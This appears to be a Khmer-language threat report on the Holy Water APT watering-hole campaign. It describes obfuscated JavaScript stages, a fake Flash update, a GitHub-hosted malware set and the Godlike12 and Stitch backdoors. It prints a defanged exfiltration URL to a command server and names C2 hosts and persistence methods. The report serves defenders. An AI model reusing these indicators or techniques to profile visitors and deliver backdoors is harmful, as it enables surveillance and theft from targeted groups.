ទឹកបរិសុទ្ធ APT

Holy Water APT គឺជាឈ្មោះដែលផ្តល់ដល់ក្រុមឧក្រិដ្ឋជនតាមអ៊ីនធឺណិតដែលបានធ្វើការវាយលុកប្រភេទរន្ធទឹកជាបន្តបន្ទាប់ប្រឆាំងនឹងក្រុមសាសនា និងជនជាតិអាស៊ី។ TTP (Tactics, Techniques and Procedures) នៃការវាយប្រហារពិសេសនេះមិនអាចត្រូវបានសន្មតថាជាតួអង្គ ATP (Advanced Persistent Threat) ដែលគេស្គាល់រួចមកហើយ ដែលនាំឱ្យអ្នកស្រាវជ្រាវសន្និដ្ឋានថានេះគឺជាក្រុមឧក្រិដ្ឋកម្មតាមអ៊ីនធឺណិតថ្មីដែលបង្ហាញពីលក្ខណៈនៃ ក្រុម Hacker តូច និងអាចបត់បែនបាន។

ដើម្បីធ្វើការវាយលុកក្នុងរន្ធទឹក ឧក្រិដ្ឋជនកំណត់គោលដៅគេហទំព័រជាច្រើនដែលត្រូវបានចូលមើលដោយគោលដៅដែលបានកំណត់ជាញឹកញាប់។ គេហទំព័រអាចជាកម្មសិទ្ធិរបស់អង្គការ អង្គការសប្បុរសធម៌ ឬបុគ្គលដែលមានឥទ្ធិពល ដែលជាកម្មសិទ្ធិរបស់ក្រុមគោលដៅ។ គេហទំព័រទាំងអស់ដែលត្រូវបានសម្របសម្រួលដោយ Holy Water ត្រូវបានបង្ហោះនៅលើម៉ាស៊ីនមេតែមួយ ហើយរួមបញ្ចូលបុគ្គលិកលក្ខណៈសាសនា អង្គការសប្បុរសធម៌ កម្មវិធីសេវាកម្មស្ម័គ្រចិត្ត និងអង្គការពាណិជ្ជកម្មដោយយុត្តិធម៌ ក្នុងចំណោមគេហទំព័រផ្សេងៗទៀត។

ការវាយប្រហាររួមបញ្ចូលដំណាក់កាលជាច្រើន។

នៅពេលចូលមើលគេហទំព័រដែលត្រូវបានសម្របសម្រួល អ្នកប្រើប្រាស់ចូលទៅក្នុងដំណាក់កាលវាយប្រហារដំបូងដែលមាន JavaScript ដែលខូចឈ្មោះ (script|jquery)-css.js និងច្រឡំជាមួយ Sojson ដែលជាសេវាកម្មគេហទំព័រដែលមានមូលដ្ឋាននៅប្រទេសចិន។ តួនាទីរបស់ស្គ្រីបនេះគឺដើម្បីកំណត់ថាតើអ្នកប្រើប្រាស់គឺជាគោលដៅត្រឹមត្រូវ ហើយដើម្បីធ្វើដូច្នេះ payload ចាប់ផ្តើម scraping ទិន្នន័យនៅលើអ្នកទស្សនា ហើយផ្ញើវាទៅម៉ាស៊ីនមេខាងក្រៅនៅ loginwebmailnic.dynssl[.]com តាមរយៈសំណើ HTTP GET៖

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

ការឆ្លើយតបពីម៉ាស៊ីនមេផ្តល់លទ្ធផលពិត ឬមិនពិត ហើយប្រសិនបើតម្លៃគឺពិត ដំណាក់កាលបន្ទាប់នៃការវាយប្រហារត្រូវបានបង្កឡើង។ បើមិនដូច្នោះទេគ្មានអ្វីកើតឡើងទេ។

ក្នុងអំឡុងពេលជំហានទីពីរ JavaScript ដែលមានឈ្មោះថា (script|jquery)-file.js ដែលជាថ្មីម្តងទៀត មានភាពច្របូកច្របល់ក្នុងលក្ខណៈដូចគ្នា។ ទោះយ៉ាងណាក៏ដោយ លើកនេះពួក Hacker បានប្រើ Sojson v5 ជំនួស v4 ។ ដើម្បីឆ្លងអ្នកប្រើប្រាស់ ទឹកបរិសុទ្ធ APT មិនទាញយកភាពងាយរងគ្រោះ ឬភាពទន់ខ្សោយរបស់កម្មវិធីណាមួយឡើយ។ ជំនួសមកវិញ បង្អួចលេចឡើងដែលផ្តល់ការអាប់ដេតកម្មវិធី Flash ត្រូវបានបង្កើត ហើយជនរងគ្រោះដែលមានសក្តានុពលត្រូវតែយល់ព្រមទាញយកឯកសារ។

ក្រុម Arsenal of Malware Tools របស់ Holy Water APT ត្រូវបានបង្ហោះនៅលើ GitHub

ប្រសិនបើអ្នកប្រើអនុញ្ញាតឱ្យការអាប់ដេត Flash ក្លែងក្លាយបន្ត វាភ្ជាប់ទៅឃ្លាំងផ្ទុក GitHub ដែលលែងសកម្មដែលមានទីតាំងនៅ github.com/AdobeFlash32/FlashUpdate ។ សំណុំឧបករណ៍ចំនួនបួនផ្សេងគ្នាត្រូវបានរក្សាទុកនៅលើទីតាំងនោះ - កញ្ចប់កម្មវិធីដំឡើង មេរោគ backdoor ដែលដាក់ឈ្មោះដោយអ្នកស្រាវជ្រាវ Godlike12 និងកំណែពីរនៃប្រភពបើកចំហ Python backdoor ដែលគេស្គាល់ថា Stitch ដែលត្រូវបានកែប្រែដោយពួក Hacker ជាមួយនឹងមុខងារពង្រីក។ កញ្ចប់អាប់ដេតគឺជាកម្មវិធីដំឡើង NSIS ដែលទម្លាក់កម្មវិធីដំឡើង Windows Flash Player ស្របច្បាប់ និងឧបករណ៍ដំណាក់កាលដែលត្រូវបានប្រើដើម្បីផ្ទុកបន្ទុកជាក់ស្តែង។ Backdoor Godlike12 ត្រូវបានសរសេរជាភាសា Go ហើយត្រូវបានប្រើដើម្បីអនុវត្តឆានែល Google Drive ទៅកាន់ម៉ាស៊ីនមេ Command and Control (C&C, C2) ។ សម្រាប់វ៉ារ្យ៉ង់របស់ Stitch backdoor បន្ថែមពីលើសកម្មភាព backdoor ធម្មតាដូចជាព័ត៌មាន និងការប្រមូលពាក្យសម្ងាត់ ការកត់ត្រាសកម្មភាព ការទាញយកឯកសារជាដើម។ ក្រុម Holy Water បានបន្ថែមសមត្ថភាពក្នុងការទាញយកកម្មវិធីដំឡើង Adobe Flash ស្របច្បាប់ ដើម្បីធ្វើបច្ចុប្បន្នភាពដោយស្វ័យប្រវត្តិ។ ខ្លួនវាផ្ទាល់ពី ubntrooters.serveuser.com និងសម្រេចបាននូវភាពស្ថិតស្ថេរដោយប្រើប្រាស់ភារកិច្ចដែលបានកំណត់ពេល។